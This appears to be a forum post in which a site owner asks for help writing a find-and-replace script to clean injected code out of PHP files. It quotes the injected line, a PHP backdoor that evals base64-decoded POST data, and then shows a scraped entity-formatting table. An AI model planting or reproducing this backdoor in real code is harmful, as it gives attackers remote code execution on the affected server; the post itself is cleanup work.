I need some help. Somehow, I've got some infected code running on a site that inserts code like this into PHP files.
<?php eval(base64_decode($_POST['n7a68bc']));?><?phpI can find a way to remove the eval part, but I'm stuk at
The character count between the brackets '' is always the same, so that should narrow it down a bit.$_POST ['variable']
Could you guys perhaps help me to create an effective find replace hotfix?
In reply to Perl variable find replace by Anonymous Monk
| For: | Use: | ||
| & | & | ||
| < | < | ||
| > | > | ||
| [ | [ | ||
| ] | ] |